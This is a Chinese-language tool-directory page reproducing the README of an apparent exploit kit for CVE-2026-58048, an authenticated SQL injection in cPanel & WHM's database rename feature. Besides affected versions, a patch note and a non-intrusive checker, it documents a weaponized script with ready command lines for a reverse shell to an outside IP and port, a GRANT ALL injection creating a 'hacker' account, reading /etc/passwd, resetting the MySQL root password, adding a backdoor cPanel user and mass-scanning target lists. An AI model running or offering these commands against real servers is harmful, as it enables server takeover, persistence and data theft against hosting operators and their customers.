Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-58048-PoC-Exploit — 👾 CVE-2026-58048 – cPanel Root SQL 执行工具包(CVSS 9.4)| 针对未修补的 cPanel & WHM 11.x 的完整红/蓝队工具套件。2 个工具:安全检测器(审计/报告)、武器化版本(反向 shell、持久化、UDF RCE、部署、文件读写、数据库操作、批量扫描)。含 Python。🦾 合乎道德地使用,遵守法律 <3 | Kitploit
工具/GitHubGitHub/tc4dy/cve-2026-58048-poc-exploit
侦察漏洞扫描器漏洞分析漏洞利用Web应用程序漏洞利用后渗透利用渗透测试红队事件响应

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
数据库安全
GitHubtc4dy/cve-2026-58048-poc-exploit

CVE-2026-58048-PoC-Exploit

👾 CVE-2026-58048 – cPanel Root SQL 执行工具包(CVSS 9.4)| 针对未修补的 cPanel & WHM 11.x 的完整红/蓝队工具套件。2 个工具:安全检测器(审计/报告)、武器化版本(反向 shell、持久化、UDF RCE、部署、文件读写、数据库操作、批量扫描)。含 Python。🦾 合乎道德地使用,遵守法律 <3

查看仓库
5251个月前尚未审核

CVEPoC

💥 CVE‑2026‑58048 – cPanel Root SQL 执行工具包

Python 3.8+ CVSS Author cPanel

⚠️ 仅限道德用途 – 授权安全测试
本仓库仅为授权安全专业人员、蓝队和渗透测试人员提供工具。
未经授权访问计算机系统在 CFAA(美国)、Computer Misuse Act(英国)、TCK 243/244(土耳其)以及全球类似法律下均属违法行为。


📖 漏洞概述

CVE‑2026‑58048 是 cPanel & WHM 11.x 版本中的一个严重 SQL 注入漏洞,允许已认证的 cPanel 用户通过数据库重命名功能以 MySQL root 权限执行任意 SQL 命令。

工作原理

  1. 需要已认证访问 – 攻击者必须在目标服务器上拥有有效的 cPanel 账户(用户名/密码)。
  2. SQL 模式操纵 – 该漏洞利用将 MySQL 会话设置为 ANSI_QUOTES 模式,从而改变解析行为。
  3. 数据库重命名注入 – 重命名数据库时,新名称未被正确过滤,允许攻击者注入任意 SQL 语句。
  4. Root 权限 – 由于重命名操作以 MySQL root 权限运行,注入的 SQL 会以最高数据库权限执行。
  5. 影响 – 完全接管数据库、权限提升、服务器沦陷、数据窃取、后门植入以及横向移动。请立即升级!

受影响版本

  • cPanel & WHM 11.110 及更早版本 – 存在漏洞
  • 11.111 – 11.118 – 存在漏洞
  • 11.119 – 11.126 – 存在漏洞
  • 11.127 – 11.134 – 存在漏洞
  • 11.135 – 11.136 – 存在漏洞
  • 11.137.x – 低于 11.137.1.6 的版本存在漏洞
  • 11.138.1.6 及更高版本 – 已修补

补丁

  • 升级至 cPanel & WHM 11.138.1.6 或更新版本。
  • 如果无法升级,作为临时缓解措施,禁用 cPanel 用户的 MySQL 重命名操作。

🧰 工具

工具用途目标用户
exploit.py完整武器化工具包,包含反向 shell、持久化、UDF RCE、文件读写、数据库操作、代理支持以及批量扫描。红队 / 授权渗透测试人员
safecheck.py非侵入式漏洞检查器,可检测 cPanel 版本并评估风险,不执行任何恶意载荷。生成详细报告。蓝队 / 安全审计人员

📊 功能对比


🎯 使用场景摘要


⚙️ 安装

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-58048-PoC-Exploit
cd CVE-2026-58048
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
colorama
pymysql

📋 参数

exploit.py 参数

safecheck.py 参数


💥 场景


🧪 端点与 API 使用

该漏洞利用使用以下 cPanel UAPI 端点:


🛡️ 负责任使用

  • 仅在您拥有或已获得明确书面测试许可的系统上使用这些工具。
  • 未经授权访问是违法且不道德的。
  • 作者对任何滥用行为不承担责任。
  • 始终遵守您所在国家的法律法规。

本软件仅供教育目的和授权安全测试使用。

下载工具
功能exploit.pysafecheck.py
漏洞检测✅✅
版本检测✅✅
MySQL root SQL 注入✅❌
反向 shell✅❌
持久化(创建 cPanel 用户)✅❌
UDF RCE(命令执行)✅❌
文件读/写✅❌
数据库操作(任意 SQL)✅❌
代理支持✅✅
批量扫描(多线程)✅❌
交互式 shell✅❌
非侵入式(安全)模式❌✅
详细/调试模式✅✅
SSL 验证控制✅✅
自定义 User‑Agent✅✅
请求延迟 / 重试✅❌
JSON / 报告输出✅✅
端点可访问性检查❌✅
SQL 模式泄露检测❌✅
场景推荐工具
蓝队 – 验证您的 cPanel 安装是否存在漏洞safecheck.py
安全审计 – 非侵入式漏洞评估safecheck.py
红队 – 授权渗透测试与完整利用exploit.py
漏洞赏金 – 负责任披露测试safecheck.py
批量扫描 – 检查多个目标是否存在漏洞exploit.py(仅检测)
事件响应 – 检查系统是否已被入侵safecheck.py
参数描述
-t, --target目标 cPanel URL(例如 https://cpanel.example.com:2083)
-l, --target-file包含目标列表的文件(每行一个),用于批量扫描
-u, --mysql-usercPanel/MySQL 用户名
-P, --mysql-passcPanel/MySQL 密码
--mysql-portMySQL 端口(默认:3306)
-p, --port覆盖 cPanel 端口(默认来自 URL 或 2083)
--threads多目标线程数(默认:10)
-o, --output将结果保存到文件(单目标)
--log详细输出的日志文件
-v, --verbose详细输出
--proxyHTTP/HTTPS 代理(例如 http://127.0.0.1:8080)
-ua, --user-agent自定义 User‑Agent
--no-keep-alive不保持会话活跃
--delay请求之间的延迟(默认:2.0s)
--max-retries最大重试次数(默认:3)
--ssl-verify验证 SSL 证书
--cmd要执行的命令(前缀为 sql: 或 udf: 以指定类型)
--inject要注入的自定义 SQL(覆盖其他操作)
--reverse-shell反向 shell IP:PORT(使用 UDF)
--passwd更改 MySQL root 密码
--adduser创建 cPanel 用户(USER DOMAIN PASSWORD)
--read通过 LOAD_FILE 读取文件
-i, --interactive利用后进入交互式 shell
--verify通过尝试 MySQL 登录验证利用是否成功
--ping利用前 ping 目标
参数描述
-t, --target目标 cPanel URL(例如 https://cpanel.example.com:2083)
-v, --verbose详细输出
--proxyHTTP/HTTPS 代理(例如 http://127.0.0.1:8080)
-ua, --user-agent自定义 User‑Agent
--ssl-verify验证 SSL 证书
--timeout请求超时时间(秒)(默认:10)
--log将报告保存到文件
--json以 JSON 格式输出结果
#场景命令
1快速漏洞检查python safecheck.py -t https://cpanel.example.com:2083
2带报告的详细扫描python safecheck.py -t https://cpanel.example.com:2083 --log report.txt --json -v
3反向 shellpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444
4执行自定义 SQL(root)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --inject "GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%' IDENTIFIED BY 'pwned'"
5读取敏感文件python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd
6更改 MySQL root 密码python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123
7创建新的 cPanel 用户(持久化)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123
8利用后进入交互式 shellpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i
9从文件批量扫描python exploit.py -l targets.txt -u user -P pass --threads 20 --output results.json
10使用代理和自定义 User‑Agentpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 -ua "Mozilla/5.0 (X11; Linux x86_64)"
端点用途
/execute/Mysql/create_database创建临时数据库
/execute/Mysql/delete_database清理已创建的数据库
/execute/Mysql/rename_database存在漏洞的端点 – 触发 SQL 注入
/execute/Version/get_version身份验证和版本检查
/execute/UserManager/create_user创建新的 cPanel 用户(持久化)
/execute/UserManager/list_users列出现有用户